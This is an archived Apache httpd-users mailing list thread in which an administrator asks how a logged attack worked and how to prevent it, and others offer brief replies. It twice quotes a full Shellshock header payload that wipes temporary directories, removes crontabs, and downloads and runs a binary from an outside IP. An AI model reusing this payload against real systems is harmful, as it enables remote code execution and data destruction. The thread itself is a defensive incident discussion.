httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Bremser, Kurt (AMOS Austria GmbH)" <Kurt.Brem...@allianz.at>
Subject Re: [users@httpd] Security question
Date Fri, 03 Jul 2015 06:05:22 GMT
I guess that the 200 comes from the fact that apache simply delivered the /index.html page.
Or did you find that "sc.gif" was transferred and executed?

Kurt Bremser
AMOS Austria

Newton was wrong. There is no gravity. The Earth sucks.
________________________________
Von: Victor Sterpu [victor@casnt.ro]
Gesendet: Donnerstag, 2. Juli 2015 14:29
An: users@httpd.apache.org
Betreff: **SPAM?** Re: [users@httpd] Security question [wd-vc]

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl
-e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/
; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall
-9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif
; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I can do to allow
only local scripts to be executed?


On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404
(the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@casnt.ro<mailto:victor@casnt.ro>>
wrote:
Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280
"-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd
/var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.*
; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan
pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x
sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I want to know so I
can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org<mailto:users-unsubscribe@httpd.apache.org>
For additional commands, e-mail: users-help@httpd.apache.org<mailto:users-help@httpd.apache.org>



AMOS Austria GmbH 
1130 Wien, Hietzinger Kai 101-105 
FN 365014k, Handelsgericht Wien 
UID: ATU 66614737 

http://www.allianz.at 

******************************************************** 
Dieses E-Mail und allfaellig daran angeschlossene Anhaenge 
enthalten Informationen, die vertraulich und 
ausschliesslich fuer den (die) bezeichneten Adressaten 
bestimmt sind. 
Wenn Sie nicht der genannte Adressat sind, darf dieses 
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen 
Personen zugaenglich gemacht noch in anderer Weise 
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen. 

Please note: This email and any files transmitted with it is 
intended only for the named recipients and may contain 
confidential and/or privileged information. If you are not the 
intended recipient, please do not read, copy, use or disclose 
the contents of this communication to others and notify the 
sender immediately. Then please delete the email and any 
copies of it. Thank you.
********************************************************
Mime
View raw message